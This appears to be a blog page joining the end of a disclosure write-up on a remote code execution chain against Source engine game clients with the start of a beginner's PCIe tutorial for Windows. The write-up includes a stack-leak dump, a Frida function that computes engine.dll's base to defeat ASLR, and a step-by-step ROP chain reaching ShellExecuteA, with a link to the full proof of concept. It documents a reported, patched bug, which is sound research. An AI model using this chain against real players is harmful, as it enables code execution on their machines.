           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

97 27 b3 7b
0a a4 bc 7b
05 b9 00 7c
05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.
Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length
The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.
The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.
The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.
The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.
The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.
The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.
Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.
Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

[2020-05-13] Reported to Valve through HackerOne
[2020-05-18] Bug triaged
[2021-04-28] Notification that the bugs were fixed in Beta
[2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Reversing Engineering for the Soul
A Practical Tutorial on PCIe for Total Beginners on Windows (Part 1)
14 February 2023 at 00:00

A Practical Tutorial on PCIe for Total Beginners on Windows (Part 1)

Reversing Engineering for the Soul

14 February 2023 at 00:00

Foreword about the series

Hello! I have been speaking to some friends and coworkers lately interested in learning more about PCIe but feeling intimidated by the complexity or the lack of simple resources for beginners. I have been working with PCIe a lot lately and felt like it might be worth sharing some of my experience in the form of a blog post.

This post is intended to be utilized by those with a background with computer systems who like to get their hands dirty. It is also intended for total beginners to PCIe or someone who is aware of the general concepts but is having trouble linking the concepts together.

First thing’s first: Do not be intimidated. There are a lot of acronyms and confusing concepts that will be made simple as you “get it”. Take things a step at the time and don’t be afraid to ask questions! (If you want to ask me questions, consider pinging me @Gbps in the #hardware channel in the Reverse Engineering Discord)

I intend to do a couple of things with this series:

Break PCIe down into what I feel is most important from the software side to learn and build a good baseline mental model for modern PC/server systems.
Show practical examples of investigating PCIe hierarchies and devices on Windows using various tools (usually WinDbg).
I will hand wave or omit some specific details intentionally to avoid confusion. Terminology here may be incorrect, even the information itself might be technically incorrect. But the purpose of this is to learn the system as a whole, not the specific details of the specification. PCIe is complex, and it is not worth getting caught up in too many details and corner-cases when building a beginner’s understanding.
Hopefully demystify this technology by relating it back to concepts you are already familiar with. PCIe did not re-invent the wheel, and you probably understand a lot more about it already than you realize by understanding technologies similar to it.

I do not intended to do the following things with this series:

Go into detail about legacy PCI or PCI-X. This technology is, in general, not important other than for historical interest.
Show you how to write a device driver for a PCIe device. This is very OS specific and is much higher level than what is going to be talked about here.
Go into detail about the link layer of PCIe. More than half of the specification is spent on this subject and contains some of the most cutting edge techology in the world for high speed data transfer. I do not deal with this side of the house, however I might in the future speak about building PCIe devices with FPGAs (which I have done before).
Help you cheat in video games with PCIe. Yes, it exists. No, I will not help. Consider playing the game normally instead.

This is not a comprehensive look into the technology or the protocol. For a truly exhaustive look, you should refer to the ever elusive PCI-SIG PCI Express Base Specification. This is the specification by which all PCIe code is implemented based on. Currently, as of writing, we are on version 6.0 of this specification, but anything from 3.0 onwards is perfectly relevant for modern PCIe. How you acquire this expensive specification is an exercise to the reader.

Without further ado, let’s talk about PCIe starting from square one.

NOTE: I will sometimes switch back and forth between “PCI” and “PCIe” when describing the technology as a force of habit. Everything in this series is about PCIe unless otherwise noted.

What is PCIe and why should I care?

PCIe stands for Peripheral Component Interconnect Express. It was introduced first in 2003 and evolved from the older PCI and PCI-X specifications that grew in popularity in the early PC era (with the added “e” for Express to differentiate it).

Most people who work with computers recognize it as the PCIe slot on their motherboard where they plug in graphics cards or adapter cards, but PCIe is way more than just these few extension ports. PCIe is the foundation of how a modern CPU speaks to practically every device connected to the system.

Since its introduction, PCIe’s popularity has skyrocketted as a near universal standard for short-distance high-speed data transmission. Nearly all M.2 SSDs use NVMe over PCIe as their transport protocol. Thunderbolt 3 brought the ability to dynamically hotplug PCIe devices directly to the system using an external cord (enabling technology such as docking stations and eGPUs). Building off of that, USB4 is in the process of extending Thunderbolt 3 to enable this PCIe routing technology to the open USB specification. New transports such as CXL for datacenter servers utilize PCIe as the base specification and extend their special sauce on top of it.

Even if the device being communicated with doesn’t natively use PCIe as its physical layer protocol, the system must still use PCI’s software interface to communicate. This is because the system uses adapters (often called Host Controllers) which are PCI devices that facilitate the translation from PCI requests from the CPU into whatever protocol or bus the Host Controller supports. For example, all USB 3.1 on this test machine utilizes the USB XHCI protocol, which is a communication protocol that bridges PCIe to USB through a PCI driver communicating with the USB Host Controller.

A USB 3.1 Host Controller. All USB on this system will happen through this controller, which is on the PCI bus.

Needless to say, PCI is running the show everywhere these day and has been fully adopted by all parts of the computing world. It is therefore important that we develop a good understanding of this technology to build a better understanding of modern computing.

Investigating a PCIe Hierarchy - A packet switched network

The most major change from legacy PCI to PCIe was the change from a true bus topology to a point-to-point link. You can think of this as the evolution of Ethernet hubs to Ethernet switches of today. Each link is a separate point-to-point link that is routed just like an Ethernet cord on a packet-switched Ethernet network. This means that PCIe is not actually a “bus protocol”, despite the word “bus” confusingly used all over the literature and technical specifications. One must carefully learn that this word “bus” does not mean multiple PCIe devices are talking on the same physical link. Packets (known as TLPs) travel across each individual link and the switching devices in the hierarchy deliver the packet to the proper ports using routing information within the packet.

Before we go into the technical details of PCIe, first we need to talk about how the whole system is laid out. The first way we will be investigating the hierarchy of PCIe is through the Windows Device Manager. Most people who are familiar with Windows have used it before, but not many people know about the very handy feature found in View > Devices by Connection.

By selecting this view, we get to see the full topology of the system from the root PNP (Plug-N-Play) node. The PNP root node is the root of the tree of all devices on Windows, regardless of what bus or protocol they use. Every device, whether virtual or physical, is enumerated and placed onto this PNP tree. We can view the layout of this tree utilizing this view of the Device Manager.

In particular, we are looking to find the layout of the PCI devices on the system. That way, we can begin to build a visual model of what the PCI tree looks like on this machine. To do that, we need to locate the root of the PCI tree: the Root Complex. The Root Complex (abbreviated RC) is the owner of all things PCIe on the system. It is located physically on the CPU silicon and it is responsible for acting as the host that all PCIe devices receive and send packets with. It can be thought of as the bridge between software (the instructions executing on your machine) and hardware (the outside world of PCIe and RAM).

On this system, it is found in the PNP hierarchy here:

NOTE: You might be asking now “if PCI runs the show, why isn’t the PCI Root Complex at the top of the tree?” The answer to that is due to the fact that the PCIe bus is not the initial layout of the system presented by firmware during boot. Instead, ACPI (Advanced Configuration & Power Interface) is what describes the existence of PCIe to the OS. While you would never see it in a PC, it is possible to describe a system with no PCI bus and everything being presented purely by ACPI. We will talk more about ACPI later, but for now do not worry about this too much, just know that ACPI is how firmware tells us where the Root Complex is located, which then helps the OS enumerate PCI devices in the tree.

So now we know that the Root Complex is the top of the PCIe tree, now let’s take a look at what all is underneath it:

Unsurprisingly, there are many devices on this PCI bus. Here we can see all sorts of controllers responsible for Audio, Integrated Graphics, USB, Serial, and SATA. In addition, we see a few of these devices known as PCI Express Root Port. A Root Port is a port on the Root Complex where another PCIe Endpoint (aka a physical ‘device’) or Switch (aka a ‘router’) can be connected to. For PCI specification sake, you will hear Endpoints referred to as Type 0 devices, and Switch (or a Bridge) referred to as Type 1 devices, due to the fact that one is configured as a device to talk to and the other is configured as a device to route packets. An RC will have as many root ports as it physically supports. That is, as many as can be connected to the CPU silicon. Some root ports on a CPU might be routed directly to a physical PCIe slot, while others might be routed to other types of slots like an NVMe slot. It might also be routed to another PCIe switching device, which can route packets to multiple ports and therefore multiple Endpoints at once.

I will keep bringing this comparison back up, but I feel it is important– if you already understand Ethernet switches, you already understand PCIe switches. You can imagine that these root ports are like Ethernet ports on your desktop computer. You could connect these directly to another device (such as a camera) or you could connect these to a switch like your home router/modem, which will switch packets to expose more connections with further devices and machines to talk to. In this case, the ethernet cords are instead copper wire connecting one PCIe port to another PCIe port, thereby making it “point-to-point”.

With this in mind, let’s start diagraming this hierarchy (partially) so we’re seeing it all laid out visually:

In PCI, all “busses” on the system are identified with a number from 0 to 255 (inclusive). In addition, all devices are identified with a “device id” and a “function id”. This is often seen described as Bus/Device/Function, or simply BDF. In more correct specification terms, this would be known as a RID (Requestor ID). To reduce confusion, I will refer to it as a BDF. BDF is important because it specifically tells us where in the PCIe hierarchy the device is located so we can communicate with it.

Because these are all on the top level of the hierarchy, we will give this “bus” a numerical identifier, it will be “Bus 0” or the Root Bus. We can verify that all of these devices are Bus 0 devices by right clicking a top level device and selecting Properties and looking at Location:

For this integrated graphics device, it is located with a BDF of 0:2.0. It is on Bus 0 (the Root Bus), a device id of 2, and a function id of 0. A “device” in this case represents a physical device, such as a graphics card. A “function” is a distinct capability that the physical device exposes to the system. It can, for all intents and purposes, be thought of as a separate entity. A device which exposes more than one function is aptly known as a Multi-Function Device (MFD). That means it exposes two or more PCI connections to the system while only physically being one device. We will look at an example of a real MFD soon.

An astute reader will notice that already we have already broken the “rule” I noted above: There are many devices connected to this singular Bus 0. This is the first exception to the “point-to-point” rule in PCIe and is only allowed in this case because Bus 0 is physically located on the silicon of the CPU. That is, there are no electrical traces between these devices, it is an imaginary connection. All of these devices exist inside the CPU package and routed using the extremely high speed electrical interconnects within it. These processor interconnects use an internal protocol that is specific to the vendor of the CPU and is not publicly documented, however we still communicate with it in the ‘language’ of PCIe. These endpoints (labelled in green), due to their special nature, will be given a special name: Root Complex Integrated Endpoints (RCIE), because they are integrated directly on the Root Complex.

This shouldn’t come as a surprise, you would expect that devices such as the integrated UHD graphics will be physically located on the CPU (as it is part of the specifications of the CPU). But we can learn about some more interesting topology of the system by observing other RCIEs, such as the fact that the RAM controller is also present here (the silicon which talks to the DRAM DIMMs of memory) and the USB controller (the silicon which talks to external USB devices). This is why certain CPUs only support certain kinds of RAM and USB specifications– because the devices which communicate are physically located on the CPU and only support the specification they were physically created to support.

UPDATE: This statement is incorrect. Some IO controllers can still be found on a discrete chip called the PCH (Intel) or also known as the chipset (AMD) which is nearby the CPU and has a high speed link that makes it seem like it is integrated into the CPU silicon. The above sentence incorrectly says that you can find the USB controller on the physical CPU, where it is more likely to be on the “chipset”. However, the memory controller that talks to RAM is found on the CPU die for speed purposes.

This diagram is a minimized version of the first level of the hierarchy, but now let’s build the rest of the hierarchy by expanding the rest of the Root Ports in the device manager.

And here’s what the filled in graph looks like:

Note: I have marked the BDF of the UHD Graphics device and Bus 0.

These root ports are physically located on the CPU, but the devices attached to it are not. There are 3 devices connected to the external PCIe slots on this machine, a NVIDIA Quadro P400 graphics card and two NVMe drives. By going to the properties of each of these in Device Manager, we can pull and update their BDF information in the visual:

Underneath each of the root ports, we can see a device is physically connected. But, we can also see we have been exposed a new Bus under each. The Root Port has acted as a Bridge, it has bridged us from Bus 0 into a new bus, therefore the new bus must be assigned a new numerical ID and all of the devices/functions underneath that port will inherit that new bus number. This is the same logic utilized by the OS/Firmware during bus enumeration during boot: All bridges and switches expose a new bus which must be assigned a new bus ID number.

In this case, we can also see a good example of a Multi-Function Device. The Quadro P400 graphics card is acting as a MFD with two functions. The first function is 0 (BDF 01:00.0) and is the graphics card device itself. The second function is 1 (BDF 01:00.1) and it is the audio controller that allows audio to be played out of the ports such as HDMI. These two functions are distinct– they serve entirely different purposes and have separate drivers and configuration associated with them, but they are still implemented by the same physical device, which is device 0, and is located on the same bus, which is bus 1. This is consistent with the point-to-point rule of PCIe, only one physical device can be connected to a link, therefore only one physical device can exist on the bus (other than the exception, bus 0).

Exploring PCIe hierarchy and devices from WinDbg

So far we’ve seen a standard PCI bus hierarchy by using Device Manager’s “View by Connection” functionality. There is another more detailed way to investigate a PCIe hierarchy: using the trusty kernel debug extensions provided by WinDbg.

NOTE: It is assumed that you understand how to set up a kernel debugger on a machine to continue following along. You can also use LiveKD for most exercises. If you do not, please refer to the guide provided by Microsoft: Set up KDNET

I have connected to a new test machine different than the one used above. We will walk through the process of graphing the hierarchy of this machine using the output of the debugger. We will also learn how to investigate information about the device through its configuration memory.

Once dropped into a debugger, we will start by using the !pcitree command. This will dump a textual tree diagram of the PCI devices enumerated on the system.

8: kd> !pcitree
Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.
  (d=5,  f=0) 80866f28 devext 0xffffdc89ba0cd4c0 devstack 0xffffdc89ba0cd370 0880 Base System Device/'Other' base system device
  (d=5,  f=1) 80866f29 devext 0xffffdc89ba0cf4c0 devstack 0xffffdc89ba0cf370 0880 Base System Device/'Other' base system device
  (d=5,  f=2) 80866f2a devext 0xffffdc89ba0d14c0 devstack 0xffffdc89ba0d1370 0880 Base System Device/'Other' base system device
  (d=5,  f=4) 80866f2c devext 0xffffdc89ba0d34c0 devstack 0xffffdc89ba0d3370 0800 Base System Device/Interrupt Controller
  (d=11, f=0) 80868d7c devext 0xffffdc89ba0d84c0 devstack 0xffffdc89ba0d8370 ff00 (Explicitly) Undefined/Unknown Sub Class
  (d=11, f=4) 80868d62 devext 0xffffdc89ba0da4c0 devstack 0xffffdc89ba0da370 0106 Mass Storage Controller/Unknown Sub Class
  (d=14, f=0) 80868d31 devext 0xffffdc89ba0dc4c0 devstack 0xffffdc89ba0dc370 0c03 Serial Bus Controller/USB
  (d=16, f=0) 80868d3a devext 0xffffdc89ba0de4c0 devstack 0xffffdc89ba0de370 0780 Simple Serial Communications Controller/'Other'
  (d=16, f=3) 80868d3d devext 0xffffdc89ba0e04c0 devstack 0xffffdc89ba0e0370 0700 Simple Serial Communications Controller/Serial Port
  (d=19, f=0) 808615a0 devext 0xffffdc89ba0e24c0 devstack 0xffffdc89ba0e2370 0200 Network Controller/Ethernet
  (d=1a, f=0) 80868d2d devext 0xffffdc89ba0e44c0 devstack 0xffffdc89ba0e4370 0c03 Serial Bus Controller/USB
  (d=1b, f=0) 80868d20 devext 0xffffdc89ba0254c0 devstack 0xffffdc89ba025370 0403 Multimedia Device/Unknown Sub Class
  (d=1c, f=0) 80868d10 devext 0xffffdc89ba0274c0 devstack 0xffffdc89ba027370 0604 Bridge/PCI to PCI
  Bus 0x4 (FDO Ext ffffdc89ba0a9190)
    No devices have been enumerated on this bus.
  (d=1c, f=1) 80868d12 devext 0xffffdc89ba02c4c0 devstack 0xffffdc89ba02c370 0604 Bridge/PCI to PCI
  Bus 0x5 (FDO Ext ffffdc89b9fe6190)
    No devices have been enumerated on this bus.
  (d=1c, f=3) 80868d16 devext 0xffffdc89ba02e4c0 devstack 0xffffdc89ba02e370 0604 Bridge/PCI to PCI
  Bus 0x6 (FDO Ext ffffdc89ba0a7190)
    (d=0,  f=0) 12838893 devext 0xffffdc89ba062270 devstack 0xffffdc89ba062120 0604 Bridge/PCI to PCI
    Bus 0x7 (FDO Ext ffffdc89ba064250)
      No devices have been enumerated on this bus.
  (d=1c, f=4) 80868d18 devext 0xffffdc89ba0304c0 devstack 0xffffdc89ba030370 0604 Bridge/PCI to PCI
  Bus 0x8 (FDO Ext ffffdc89ba0b2190)
    No devices have been enumerated on this bus.
  (d=1d, f=0) 80868d26 devext 0xffffdc89ba0364c0 devstack 0xffffdc89ba036370 0c03 Serial Bus Controller/USB
  (d=1f, f=0) 80868d44 devext 0xffffdc89ba0384c0 devstack 0xffffdc89ba038370 0601 Bridge/PCI to ISA
  (d=1f, f=2) 80868d02 devext 0xffffdc89ba03a4c0 devstack 0xffffdc89ba03a370 0106 Mass Storage Controller/Unknown Sub Class
  (d=1f, f=3) 80868d22 devext 0xffffdc89ba03c4c0 devstack 0xffffdc89ba03c370 0c05 Serial Bus Controller/Unknown Sub Class

NOTE: If you have an error Error retrieving address of PciFdoExtensionListHead, make sure your symbols are set up correctly and run .reload pci.sys to reload PCI’s symbols.

When presented with this output, it might be difficult to visually see the “tree” due to the way the whitespace is formatted. The way to interpret this output is to look at the indentation of the Bus 0x text. Anything indented one set of spaces further than the Bus 0x line is a device on that bus. We can see there are also other Bus 0x lines directly underneath a device. That means that the device above the Bus 0x line is exposing a new bus to us, and the bus number is given there.

Let’s take look at a specific portion of this output:

Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.

In this output, we can see the BDF displayed of each device. We can also see a set of Root Ports that exist on Bus 0 that do not have any devices enumerated underneath, which means that the slots have not been connected to any devices.

It should be easier to see the tree structure here, but let’s graph it out anyways:

NOTE: It is just a coincidence that the bus numbers happen to match up with the device numbers of the Bridge/PCI to PCI ports.

As you now know, the devices labelled as Bridge/PCI to PCI are in fact Root Ports, and the device on Bus 2 is in fact a Multi-Function Device. Unlike the device manager, we don’t see the true name of the device from !pcitree. Instead, we are just given a generic PCI name for what “type” of the device advertises itself as. This is because Device Manager is reading the name of the device from the driver and not directly from PCI.

To see more about what this Display Controller device is, we can use the command !devext [pointer], where [pointer] is the value directly after the word devext in the layout. In this case, it is:

(d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA

!devext 0xffffdc89ba04f270

From here, we will get a printout of a summary of this PCI device as seen from the PCI bus driver in Windows, pci.sys:

8: kd> !devext 0xffffdc89ba04f270
PDO Extension, Bus 0x2, Device 0, Function 0.
  DevObj 0xffffdc89ba04f120  Parent FDO DevExt 0xffffdc89ba0a8190
  Device State = PciStarted
  Vendor ID 10de (NVIDIA CORPORATION)  Device ID 13BB
  Subsystem Vendor ID 103c (HEWLETT-PACKARD COMPANY)  Subsystem ID 1098
  Header Type 0, Class Base/Sub 03/00  (Display Controller/VGA)
  Programming Interface: 00, Revision: a2, IntPin: 01, RawLine 00
  Possible Decodes ((cmd & 7) = 7): BMI
  Capabilities: Ptr=60, power msi express 
  Express capabilities: (BIOS controlled) 
  Logical Device Power State: D0
  Device Wake Level:          Unspecified
  WaitWakeIrp:                <none>
  Requirements:     Alignment Length    Minimum          Maximum
    BAR0    Mem:    01000000  01000000  0000000000000000 00000000ffffffff
    BAR1    Mem:    10000000  10000000  0000000000000000 ffffffffffffffff
    BAR3    Mem:    02000000  02000000  0000000000000000 ffffffffffffffff
    BAR5     Io:    00000080  00000080  0000000000000000 00000000ffffffff
      ROM BAR:      00080000  00080000  0000000000000000 00000000ffffffff
    VF BAR0 Mem:    00080000  00080000  0000000000000000 00000000ffffffff
  Resources:        Start            Length
    BAR0    Mem:    00000000f2000000 01000000
    BAR1    Mem:    00000000e0000000 10000000
    BAR3    Mem:    00000000f0000000 02000000
    BAR5     Io:    0000000000001000 00000080
  Interrupt Requirement:
    Line Based - Min Vector = 0x0, Max Vector = 0xffffffff
    Message Based: Type - Msi, 0x1 messages requested
  Interrupt Resource:    Type - MSI, 0x1 Messages Granted

There is quite a lot of information here that the kernel knows about this device. This information was retrieved through Configuration Space (abbrev. “config space”), a section of memory on the system which allows the kernel to enumerate, query info, and setup PCI devices in a standardized way. The software reads memory from the device to query information such as the Vendor ID, and the device (if it is powered on) responds back with that information. In the next section, I will discuss more about how this actually takes place, but know that the information queried here was produced from config space.

So let’s break down the important stuff:

DevObj: The pointer to the nt!_DEVICE_OBJECT structure which represents the physical device in the kernel.
Vendor ID: A 16-bit id number which is registered to a particular device manufacturer. This value is standardized, and new vendors must be assigned a unique ID by the PCI-SIG so they do not overlap. In this case, we see this is a NVIDIA graphics card.
Device ID: A 16-bit id number for the particular chip doing PCIe. Similar idea in that a company must request a unique ID for their chip so it doesn’t conflict with any others.
Subsystem Vendor ID: The vendor id of the board the chip sits on. In this case, “HP” is the producer of the graphics card, and “NVIDIA” designed the graphic chip.
Subsystem Device ID: The device id of the board the chip sits on.
Logical Device Power State: The power state of this device. There are two major power states in PCI, D0 = Device is powered on, D3 = Device is in a low-power state, or completely off.
Requirements: The memory requirements the device is asking the OS to allocate for it. More on this later.
Resources: The memory resources assigned to this device by the OS. This device is powered on and started already, so it already has its resources assigned.
Interrupt Requirement/Resource: Same as above, except for interrupts.

